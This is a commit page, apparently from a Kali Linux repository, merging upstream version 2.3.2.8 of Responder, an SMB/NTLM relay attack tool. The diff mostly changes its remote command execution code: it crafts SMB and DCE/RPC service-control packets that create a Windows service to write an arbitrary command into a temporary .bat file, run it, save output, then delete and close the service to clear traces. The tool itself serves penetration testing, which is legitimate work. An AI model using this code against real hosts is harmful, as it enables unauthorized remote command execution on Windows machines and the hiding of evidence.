Commit 86044e03 authored by Sophie Brun's avatar Sophie Brun

Merge tag 'upstream/2.3.2.8' into kali/master

Upstream version 2.3.2.8
parents a43e2fe2 50ddc39b
......@@ -20,7 +20,7 @@ import subprocess
from utils import *
__version__ = 'Responder 2.3.2.7'
__version__ = 'Responder 2.3.2.8'
class Settings:
......
......@@ -324,6 +324,7 @@ class SMBTreeConnectData(Packet):
BccComplete = str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
self.fields["Bcc"] = struct.pack("<i", len(BccComplete))[:2]
class SMBNTCreateData(Packet):
fields = OrderedDict([
("Wordcount", "\x18"),
......@@ -352,7 +353,6 @@ class SMBNTCreateData(Packet):
Data1= str(self.fields["FileName"])+str(self.fields["FileNameNull"])
self.fields["FileNameLen"] = struct.pack("<h",len(str(self.fields["FileName"])))
self.fields["Bcc"] = struct.pack("<h",len(Data1))
class SMBReadData(Packet):
fields = OrderedDict([
("Wordcount", "\x0a"),
......@@ -574,13 +574,12 @@ class SMBDCESVCCTLCreateService(Packet):
File = "%WINDIR%\\Temp\\"+self.fields["FileName"]
WinTmpPath = "%WINDIR%\\Temp\\Results.txt"
CleanService = "sc delete "+self.fields["ServiceName"]+"^&"#Start by deleting the service..then run the cmd.
FinalCMD = CleanService+"del /F /Q "+File+"^&"+self.fields["BinCMD"]+" ^>"+WinTmpPath+" >"+File
#That is: delete service we just ran, delete the bat file (it's loaded in memory, no pb), echo original cmd into random .bat file, run .bat file.
FinalCMD = "del /F /Q "+File+"^&"+self.fields["BinCMD"]+" ^>"+WinTmpPath+" >"+File
#That is: echo cmd into random .bat file, run .bat file, delete the bat file (it's loaded in memory).
self.fields["FileName"] = ""#Reset it.
self.fields["BinPathName"] = "%COMSPEC% /C echo "#make sure to escape "&" when using echo.
self.fields["BinCMD"] = FinalCMD
self.fields["BintoEnd"] = "& %COMSPEC% /C "+File
self.fields["BintoEnd"] = "& %COMSPEC% /C "+File+" &exit"#make sure to exit when done.
BinDataLen = str(self.fields["BinPathName"])+str(self.fields["BinCMD"])+str(self.fields["BintoEnd"])
## Calculate first
......@@ -621,6 +620,17 @@ class SMBDCESVCCTLStartService(Packet):
("MaxCount", "\x00\x00\x00\x00\x00\x00\x00\x00"),
])
class SMBDCESVCCTLDeleteService(Packet):
fields = OrderedDict([
("ContextHandle", ""),
])
class SMBDCESVCCTLCloseService(Packet):
fields = OrderedDict([
("ContextHandle", ""),
])
class OpenAndX(Packet):
fields = OrderedDict([
("Wordcount", "\x0f"),
......@@ -638,12 +648,11 @@ class OpenAndX(Packet):
("Reserved2", "\x00\x00\x00\x00"),
("Bcc", "\x0b\x00"),
("Terminator", ""),
("File", "\\hola.txt"),
("FileNull", "\x00"),#00 00
("File", "\\"),
("FileNull", "\x00"),
])
def calculate(self):
#self.fields["File"] = self.fields["File"].encode('utf-16le')
self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Terminator"])+str(self.fields["File"])+str(self.fields["FileNull"])))
class ReadRequest(Packet):
......@@ -662,7 +671,7 @@ class ReadRequestAndX(Packet):
("Wordcount", "\x0C"),
("AndXCommand", "\xff"),
("Reserved", "\x00"),
("AndXOffset", "\xde\xde"),#
("AndXOffset", "\xde\xde"),
("FID", "\x02\x40"),
("Offset", "\x00\x00\x00\x00"),
("MaxCountLow", "\xf0\xff"),
......@@ -849,8 +858,49 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host):
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC SVCCTLDeleteService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n"
return False
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandler)
x = SMBDCEPacketData(Opnum="\x02\x00",Data=w)
x.calculate()
t = SMBTransDCERPC(FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to delete the service.\n"
return False
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandler)
x = SMBDCEPacketData(Opnum="\x00\x00",Data=w)
x.calculate()
t = SMBTransDCERPC(FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
##Close FID Request
if data[8:10] == "\x25\x00":
head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
t = CloseRequest(FID = f)
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
##Tree connect c$
if data[8:10] == "\x25\x00":
if data[8:10] == "\x04\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n"
......@@ -937,3 +987,4 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host):
return data
......@@ -20,7 +20,7 @@ from Finger import RunFinger
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../../')))
from socket import *
__version__ = "0.4"
__version__ = "0.5"
def UserCallBack(op, value, dmy, parser):
args=[]
......@@ -384,3 +384,4 @@ if __name__ == '__main__':
raise
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment